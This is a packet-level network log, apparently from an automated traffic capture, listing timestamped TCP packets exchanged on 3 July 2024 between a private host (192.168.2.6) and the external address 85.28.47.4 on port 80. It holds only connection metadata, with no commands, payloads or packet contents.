Jul 3, 2024 18:08:37.997257948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997272015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997282028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997284889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997292995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997304916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997307062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997315884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997327089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997327089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997338057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997345924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997349024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997359991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997363091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997371912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997386932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997392893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997426033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998085976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998100996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998111010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998121977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998131990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998135090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998143911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998150110 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998155117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998166084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998177052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998183012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998187065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998198032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998208046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998213053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998219013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998230934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998240948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998240948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998251915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998253107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998262882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998272896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998274088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998286963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998306990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998322964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998905897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998917103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998927116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998938084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998949051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998955011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998960018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998970985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998975039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.998981953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998992920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.998992920 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.999003887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.999015093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.999025106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.999026060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.999038935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.999048948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.999052048 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.999072075 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.999099016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.083477974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083503008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083513975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083614111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.083631992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083652973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083664894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083676100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083687067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083753109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083797932 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.083797932 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.083797932 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.083858013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083869934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083880901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083887100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.083893061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083903074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083906889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.083914995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.083939075 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.083957911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084038973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084076881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084098101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084110975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084141970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084151030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084197998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084208965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084219933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084232092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084233046 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084258080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084271908 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084393024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084427118 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084476948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084495068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084506035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084515095 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084517956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084527016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084542036 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084556103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084728956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084739923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084752083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084763050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084774017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084779024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084793091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084794998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084806919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084821939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084822893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084846973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084847927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084857941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084870100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084872007 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084882021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084889889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084894896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084906101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.084918022 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084934950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.084958076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085195065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085206985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085217953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085237980 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085268021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085283041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085294962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085305929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085319996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085335970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085350990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085503101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085514069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085524082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085535049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085544109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085546017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085556984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085567951 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085568905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085580111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085608006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085769892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085783005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085793972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085804939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085808992 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085815907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085825920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085835934 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085839033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085850000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085864067 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085866928 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085879087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085881948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085891008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085902929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085907936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085913897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085926056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085937023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085937977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085947990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085948944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.085968971 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.085988045 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086283922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086486101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086498022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086508036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086519957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086528063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086529970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086540937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086559057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086559057 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086570978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086580038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086581945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086591005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086592913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086604118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086615086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086618900 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086626053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086637020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086644888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086647987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086659908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086664915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086673021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086683989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086684942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086697102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086700916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086708069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086719036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086728096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086730003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.086752892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.086769104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.087362051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087373972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087383986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087395906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087405920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087408066 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.087416887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087426901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087435961 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.087445974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087457895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087459087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.087469101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087481022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087491989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087493896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.087502956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087508917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.087513924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087537050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.087542057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087553978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.087568045 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.087589979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172112942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172137976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172148943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172205925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172216892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172223091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172228098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172278881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172290087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172301054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172404051 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172404051 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172404051 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172415972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172427893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172439098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172463894 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172470093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172492981 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172509909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172564983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172591925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172602892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172614098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172625065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172631025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172636032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172656059 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172672033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172832966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172854900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172866106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172873020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172878027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172890902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172902107 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172903061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172915936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.172916889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172938108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.172955036 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173085928 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173111916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173122883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173134089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173151970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173177004 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173187017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173198938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173213959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173221111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173228979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173247099 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173274040 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173309088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173320055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173360109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173404932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173417091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173427105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173438072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173444033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173449039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173461914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173474073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173475027 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173511982 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173511982 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173666954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173677921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173707962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173715115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173719883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173731089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173742056 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173742056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173764944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173789978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173898935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173909903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173937082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173943996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173945904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.173969984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.173994064 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174113989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174124956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174137115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174148083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174160004 CEST	80	49710	85.28.47.4	192.168.2.6
